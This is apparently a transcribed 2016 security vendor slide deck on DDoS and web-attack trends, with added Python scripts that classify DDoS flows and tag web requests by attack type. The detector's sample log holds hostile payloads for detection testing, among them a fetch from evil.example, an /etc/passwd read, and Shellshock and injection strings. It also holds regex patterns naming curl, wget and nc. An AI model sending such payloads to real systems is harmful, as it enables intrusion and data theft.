Post on 01-Apr-2021

www.cloudsec.com/tw | #CLOUDSEC

DDoS attack patterns across the APJ cloud market

Samuel Chen, CCIE#9607, Enterprise Security Architect, Manager - APJ


DDoS attacks from Q1 2014 to Q1 2016

• Each dot represents an individual DDoS attack, and each interval covers a 10-fold increase in attack size. The boxes mark the interquartile range – the middle 50% of attacks.


DDoS Attack Median Packet Rate and IQR

While there were six DDoS attacks in Q1 that exceeded 30 Mpps, more than half of the attacks measured 1 Mpps or less.

The graph shows the packet rate for the middle 50% of DDoS attacks from Q1 2014 – Q1 2016


Compared to Q1 2015

• 125% increase in total DDoS attacks

• 142% increase in infrastructure layer attacks

• 35% decrease in average attack duration

• 138% increase in total attacks > 100 Gbps

In Q1 2016, repeat DDoS attacks remained the norm, with an average of 29 attacks per targeted customer. One target suffered 283 attacks – an average of three times per day for the quarter.


Compared to Q4 2015

• 23% increase in total DDoS attacks

• 107% increase in repeat attacks per target

• 23% increase in infrastructure layer attacks

• 8% increase in average attack duration

• 280% increase in total attacks > 100 Gbps

Largest attack: 289 Gbps

Most packets per second: 67 Mpps

In Q1 2016, stresser/booter-based botnets remained the source of the vast majority of DDoS attacks observed by Akamai. These tools rely heavily upon reflection techniques to fuel their traffic.


Types of DDoS Attacks & Relative Distribution in Q1 2016

UDP Fragment, DNS, NTP and CHARGEN attack vectors made up almost 70% of the attacks.

Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks.

10 Most Frequent Attack Vectors by Quarter

TCP Anomaly attacks remain in the top 10 vectors; they first edged out ICMP attacks in Q4 2015.


Multi-Vector DDoS Attacks Are the Norm

Multi-vector attacks accounted for 59% of DDoS activity in Q1 2016, up from 56% in Q4 2015


Reflection-Based DDoS Attacks, Q1 2015 – Q1 2016

SSDP, NTP, DNS, and CHARGEN have consistently been the most common reflection attack vectors, as shown on the left axis. The use of reflection attacks has increased dramatically since Q1 2015, as shown on the right axis.
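The three slides above describe the same traffic from different angles: the dominant vectors (UDP Fragment, DNS, NTP, CHARGEN), the fact that most attacks are multi-vector, and the rise of reflection. The script below is an added example, not code from the deck or from Akamai: it takes flow records as seen at the victim, maps each to a vector by the classification rule a scrubbing analyst would use (reflected traffic arrives from the reflector's service port, 19/53/123/1900), then reports per target the bytes per vector, the share of reflected traffic and whether the attack was multi-vector. The flow records are constructed, and their field layout is an assumption rather than a real NetFlow/IPFIX export.

```python
"""Classify DDoS flow records by vector and flag reflection and
multi-vector attacks per target.

Added example: not from the CLOUDSEC deck and not Akamai's tooling. The
flow records are constructed, and the record layout (src/dst, ports,
protocol, packets, bytes, fragmented, TCP flags) is an assumption rather
than a real NetFlow/IPFIX export.
"""
from collections import defaultdict
from dataclasses import dataclass

# UDP services abused as reflectors, keyed by the source port seen on the
# reflected traffic: the reflector answers the spoofed request from its
# service port, so at the victim the attack traffic carries that port.
REFLECTOR_PORTS = {19: "CHARGEN", 53: "DNS", 123: "NTP", 1900: "SSDP"}


@dataclass(frozen=True)
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str                # "UDP", "TCP" or "ICMP"
    packets: int
    bytes: int
    fragmented: bool = False  # any packet had MF set or a non-zero fragment offset
    tcp_flags: str = ""       # e.g. "S" for SYN-only


def classify(flow: Flow) -> str:
    """Map one flow to a vector name following the deck's categories."""
    if flow.proto == "UDP":
        vector = REFLECTOR_PORTS.get(flow.src_port)
        if vector:
            # Large DNS/NTP answers exceed the path MTU and arrive fragmented;
            # they still belong to the reflection vector, not to "UDP Fragment".
            return vector
        return "UDP Fragment" if flow.fragmented else "UDP Flood"
    if flow.proto == "TCP":
        # SYN-only flows are SYN floods; other odd TCP traffic goes in the
        # deck's "TCP Anomaly" bucket (assumption about what that bucket holds).
        return "SYN" if flow.tcp_flags == "S" else "TCP Anomaly"
    return flow.proto


def summarize(flows):
    """Per target: bytes and bytes/packet per vector, reflection share, multi-vector flag."""
    acc = defaultdict(lambda: defaultdict(lambda: [0, 0]))  # dst -> vector -> [bytes, packets]
    for f in flows:
        cell = acc[f.dst_ip][classify(f)]
        cell[0] += f.bytes
        cell[1] += f.packets
    report = {}
    for dst, vectors in acc.items():
        total = sum(b for b, _ in vectors.values())
        reflected = sum(b for v, (b, _) in vectors.items() if v in REFLECTOR_PORTS.values())
        report[dst] = {
            "vectors": {v: {"bytes": b, "bytes_per_packet": b / p} for v, (b, p) in vectors.items()},
            "total_bytes": total,
            "reflection_share": reflected / total if total else 0.0,
            # The deck's "multi-vector" means more than one vector against one target.
            "multi_vector": len(vectors) > 1,
        }
    return report


# Constructed flows: a reflection/fragment mix against 203.0.113.10 and a
# plain SYN flood against 203.0.113.20 (all addresses are documentation ranges).
SAMPLE_FLOWS = [
    Flow("198.51.100.7", 123, "203.0.113.10", 4444, "UDP", packets=1000, bytes=440_000),
    Flow("198.51.100.8", 53, "203.0.113.10", 4444, "UDP", packets=500, bytes=1_500_000, fragmented=True),
    Flow("198.51.100.9", 1900, "203.0.113.10", 80, "UDP", packets=2000, bytes=600_000),
    Flow("192.0.2.5", 40000, "203.0.113.10", 80, "UDP", packets=3000, bytes=60_000, fragmented=True),
    Flow("192.0.2.6", 50000, "203.0.113.20", 443, "TCP", packets=10000, bytes=400_000, tcp_flags="S"),
]

if __name__ == "__main__":
    for dst, row in summarize(SAMPLE_FLOWS).items():
        print(dst, row)
```

Two caveats the report numbers depend on. Bytes per packet is the practical tell for reflection (answers are much larger than the spoofed queries), which is why the fragmented DNS flow still counts as DNS rather than as "UDP Fragment". And the source addresses in reflected flows are the reflectors, not the attacker, which is why the deck's source-country slides are careful to speak of non-spoofed attacks.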


DDoS Attack Frequency by Industry


Average Number of DDoS Attacks per Target

In Q1 2016 there were an average of 29 DDoS attacks per target, up from 24 last quarter. One target was hit with 283 attacks – averaging more than 3 attacks per day.


Top 10 Source Countries for DDoS Attacks in Q1 2016

China was the top source of non-spoofed DDoS attacks in the first quarter, followed by the US.


Top 5 Source Countries for DDoS Attacks, Q1 2015 – Q1 2016

China has been the top source country for DDoS attacks since Q1 2015, with the exception of Q3 2015, when the UK took the top spot.


Mega Attacks > 100 Gbps in Q1 2016

Nineteen attacks exceeded 100 Gbps in Q1 2016, with the largest hitting the software and technology, gaming and media-entertainment sectors.


Mega Attacks > 30 Mpps in Q1 2016

Of the six attacks exceeding 30 Mpps in Q1 2016, the four largest targeted the software and technology sector.


Spotlight:

Attack traffic distribution within scrubbing center locations, highlighted with Frankfurt absorbing the highest peak bandwidth of 104 Gbps.

Web Application Attack Analysis

9 Common Web Attack Vectors

• SQLi / SQL injection: User content is passed to an SQL statement without proper validation

• LFI / Local file inclusion: Gains unauthorized read access to local files on the web server

• RFI / Remote file inclusion: Abuse of the dynamic file include mechanism available in many programming languages to load remote malicious code into the victim web application

• PHPi / PHP injection: Injects PHP code that gets executed by the PHP interpreter

• CMDi / Command injection: Executes arbitrary shell commands on the target system

• JAVAi / Java injection: Abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular due to recent flaws in the Java-based Struts Framework, which uses OGNL extensively

• MFU / Malicious file upload (or unrestricted file upload): Uploads unauthorized files to the target application that may be used later to gain full control over the system

• XSS / Cross-site scripting: Injects client-side code into web pages viewed by others, whose browsers execute the code within the security context (or zone) of the hosting web site. Reads, modifies and/or transmits data accessible by the browser

• Shellshock / Disclosed in September 2014: A vulnerability in the Bash shell (the default shell for Linux and Mac OS X) that allows for arbitrary command execution by a remote attacker
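The "attack triggers" counted in the slides that follow are WAF rule matches, one per vector. The script below is an added example, not code from the deck or from Akamai's WAF: it carries one illustrative signature per vector in the list above, runs them over constructed access-log lines (Combined Log Format is assumed), and tallies triggers by vector. The request is URL-decoded before matching, since encoded payloads are the first thing a scanner tries, and the User-Agent is searched as well, because Shellshock payloads arrive in headers rather than in the URL. The final log line is a legitimate redirect parameter included on purpose: it shows the false positive a naive "URL in a parameter" RFI rule produces and which a real rule set has to tune out.

```python
"""Tag web requests with the nine attack vectors listed above.

Added example: not from the CLOUDSEC deck or from any Akamai product.
The rule patterns are illustrative signatures, not a production WAF rule
set, and the access-log lines are constructed (Combined Log Format is
assumed). MFU is matched on a filename parameter only because a log line
carries no request body; real upload inspection needs the multipart body.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One regex per vector, applied to the URL-decoded request and to the
# Referer and User-Agent headers.
RULES = {
    "SQLi": re.compile(r"(?i)union[\s/*]+(all\s+)?select|'\s*or\s+'?1'?\s*=\s*'?1|\bsleep\s*\(|\bbenchmark\s*\("),
    "LFI": re.compile(r"(\.\./){2,}|/etc/passwd|/proc/self/environ"),
    "RFI": re.compile(r"(?i)[?&][a-z_]+=(https?|ftp)://"),
    "PHPi": re.compile(r"(?i)<\?php|php://(input|filter)|\beval\s*\("),
    "CMDi": re.compile(r"(?i)[;|`]\s*(cat|ls|id|uname|wget|curl|nc|bash|sh)\b|\$\("),
    "JAVAi": re.compile(r"[%$]\{|@java\.lang\.|ognl\."),          # OGNL expression markers
    "MFU": re.compile(r"(?i)filename=[^&\s]*\.(php\d?|phtml|jsp|aspx?|cgi)\b"),
    "XSS": re.compile(r"(?i)<script|javascript:|\bon(error|load|mouseover)\s*="),
    "Shellshock": re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;"),          # the "() { :;};" prefix
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)


def detect(line: str):
    """Return {'ip', 'uri', 'vectors'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Decode twice so a double-encoded payload (e.g. %253C for '<') is also seen.
    uri = unquote_plus(unquote_plus(m["uri"]))
    haystack = "\n".join(s for s in (uri, m["referer"], m["ua"]) if s)
    vectors = sorted(name for name, rx in RULES.items() if rx.search(haystack))
    return {"ip": m["ip"], "uri": m["uri"], "vectors": vectors}


def analyze(lines):
    """Detect every parseable line; a request can trigger more than one vector."""
    return [hit for hit in map(detect, lines) if hit is not None]


def triggers_by_vector(lines):
    """Tally of rule triggers per vector, the quantity the deck's slides chart."""
    counts = Counter()
    for hit in analyze(lines):
        counts.update(hit["vectors"])
    return counts


# Constructed log lines (documentation IPs); the last one is a benign redirect.
SAMPLE_LOG = [
    '198.51.100.23 - - [15/Feb/2016:10:00:01 +0000] "GET /products?id=1%27%20or%201=1-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Feb/2016:10:00:02 +0000] "GET /view.php?file=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.24 - - [15/Feb/2016:10:00:03 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 300 "-" "curl/7.47"',
    '198.51.100.24 - - [15/Feb/2016:10:00:04 +0000] "GET /ping?host=127.0.0.1%3Bcat%20/etc/passwd HTTP/1.1" 200 700 "-" "curl/7.47"',
    '198.51.100.25 - - [15/Feb/2016:10:00:05 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.26 - - [15/Feb/2016:10:00:06 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "-" "() { :;}; /bin/bash -c id"',
    '198.51.100.27 - - [15/Feb/2016:10:00:07 +0000] "GET /index.action?name=%25%7B(%23cmd%3D%27id%27)%7D HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.27 - - [15/Feb/2016:10:00:08 +0000] "GET /page.php?tpl=%3C%3Fphp%20system(%27id%27)%3B%20%3F%3E HTTP/1.1" 200 400 "-" "Mozilla/5.0"',
    '198.51.100.28 - - [15/Feb/2016:10:00:09 +0000] "POST /upload?filename=shell.php HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [15/Feb/2016:10:00:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [15/Feb/2016:10:00:11 +0000] "GET /login?next=https://www.example.com/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(hit["ip"], hit["vectors"], hit["uri"])
    print(triggers_by_vector(SAMPLE_LOG))
```

The command-injection line trips both CMDi and LFI, which is how a single request inflates more than one vector's trigger count; and the redirect line counts as an RFI trigger even though it is harmless, so trigger totals overstate real attacks unless the rules are tuned per application.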


Web Application Attack Vectors Over HTTP, Q1 2016

SQLi, LFI and XSS were the most prevalent attack vectors. They were used in more than 90% of the attacks over HTTP.


Attacks Over HTTPS, Q1 2016

30% of the web application attacks observed in Q1 2016 were over encrypted (HTTPS) connections, an increase from only 11% the previous quarter.


Top 10 Source Countries for Web Application Attacks, Q1 2016

Top 10 Target Countries for Web Application Attacks, Q1 2016

US-hosted web sites were targeted six times more often than the second most popular target country, Brazil.


Web Application Attacks by Industry, Q1 2016

As in previous quarters, the retail industry was most frequently targeted with web application attacks in Q1 2016.


Web Application Attack Triggers by Industry, Q1 2016

94% of the attack triggers for web application attacks in Q1 2016 targeted just eight industries (shown in black).


SQLi and LFI Attack Triggers by Target Industry, Q1 2016


Shellshock, XSS, and MFU Attack Triggers by Industry


CMDi, PHPi, and RFI Attack Triggers by Industry


24 Hour Bot Traffic Snapshot

Akamai Intelligent Platform™ Firewall Activity


Reflector Activity

• The location of leveraged Internet devices used in reflection-based DDoS attacks during Q1 2016 was concentrated in the US, Asia, and Europe.


Top 10 Reflection Sources by ASN


DDoS Reflection Sources

Cloud Security Resources

Samuel Chen, CCIE#9607, Enterprise Security Architect, Manager - APJ